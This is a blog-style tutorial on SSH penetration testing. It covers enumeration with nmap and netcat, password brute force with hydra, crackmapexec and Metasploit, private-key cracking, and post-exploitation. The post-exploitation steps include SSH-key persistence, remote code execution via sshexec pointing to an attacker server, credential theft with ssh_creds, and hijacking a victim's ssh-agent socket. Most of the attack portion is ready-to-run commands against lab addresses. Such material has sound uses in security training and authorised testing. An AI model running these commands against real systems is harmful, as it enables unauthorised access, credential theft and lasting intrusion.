SSH Penetration Testing Fundamentals
Posted in: Network Security

Free The Ultimate Guide to SSH Penetration Testing

Welcome, today I am writing about SSH Penetration Testing fundamentals describing port 22 vulnerabilities. SSH security is one of the topics we all need to understand, remote access services can be an entry point for malicious actors when configured improperly.

Understand SSH Protocol

Understanding how SSH works are out of scope, here I assume you already are familiar with the service and how can be configured on a Linux host.

Some things to remember, SSH works on port 22 by default and uses a client-server architecture, which is used to access remote hosts securely.

SSH can implement different types of authentication each one of them has its security vulnerabilities, keep that in mind! One of the most used methods to authenticate is the use of RSA Keys using the PKI infrastructure. Another great feature is the possibility to create encrypted tunnels between machines or implement port forwarding on local or remote services, or Us as pentesters we can use it to pivot inside the network under the radar since SSH is a well-known tool by sysadmins.

Read more about Pivoting using SSH

SSH Penetration Testing

Ok let’s talk about how to pentest SSH, as you know its all start with enumeration we can use some tools to do all the work for us or we can do it manually.

Some questions to ask before starting enumerating

  • Is there any SSH server running?
  • On what Port?
  • What version is running?
  • Any Exploit to that version?
  • What authentication type is used? Passwords / RSA Keys
  • It is blocking brute force?

After we have all the answers we can start thinking about what to do, if don’t have any information about users or passwords/kays yet is better to search for an exploit unfortunately SSH exploits are rare, search my website if there are any exploits.

Damn it, we are stuck :/

It’s time to go enumerate other services and try to find something that can be used like usernames or RSA Keys, remember keys usually have the username at the bottom.

Assuming we found one or more usernames we can try to brute force the service using a good wordlist or if we were lucky and have found an RSA Key with a username, We Are In!

Haha is not so easy, but OK, we are learning…

SSH Client Interesting Files

SSH client configuration file, this file can be used

/etc/ssh/ssh_config

Default folder containing RSA Keys

cd ~/.ssh
cd /home/rfs/.ssh
Free The Ultimate Guide to SSH Penetration Testing
cat /home/rfs/.ssh/known_hosts

SSH Enumeration

After we scan a network and identify port 22 open on a remote host we need to identify what SSH service is running and what version and for that, we can use Nmap.

nmap -sV -p22 192.168.1.96
Free The Ultimate Guide to SSH Penetration Testing

SSH Banner Grabber

Banner grabbing is and eay technique to do but can help us a lot, we can verify what service version is runnig on the remote server and try to find a CVE related to it.

nc 192.168.1.96 22
ssh -v 192.168.1.96
SSH Servers ListWebsite
Dropbear Server
OpenSSH Server
wolfSSH Server
CopSSH Server
Cisco SSH Server
IBM SSH

Attack SSH port 22

At this point, we only know what service running on port 22 and what version it has (OpenSSH_4.7p1 Debian-8ubuntu1), assuming we have found the username msfadmin we will try to brute-force his password using hydra.

Bruteforce SSH Service

hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run

Crack SSH Private Keys

ssh2john
john

SSH Exploits

VersionExploit
OpenSSH <7.4
SSH Exploits

Post Exploitation

Persistence

use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) >exploit

SSH User Code Execution

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) >set rhosts 192.168.1.103
msf exploit(sshexec) >set username ignite
msf exploit(sshexec) >set password 123
msf exploit(sshexec) >set srvhost 192.168.1.107
msf exploit(sshexec) >exploit

Lateral Movement

Steal SSH credentials

If we have a meterpreter shell we can use the post exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.

use post/multi/gather/ssh_creds
msf post(ssh_creds) >set session 1
msf post(ssh_creds) >exploit

SSH Hijacking

# Attacker finds the SSHd process of the victim
ps uax|grep sshd
 
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ
# Attacker hijack's victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
 
# Attacker can login to remote systems as the victim
ssh remote_system -l vicitm

SSH Tunnels

Working with RSA Keys

LibSSH RCE

CVE-2018-10933

sshaudit

Back to Top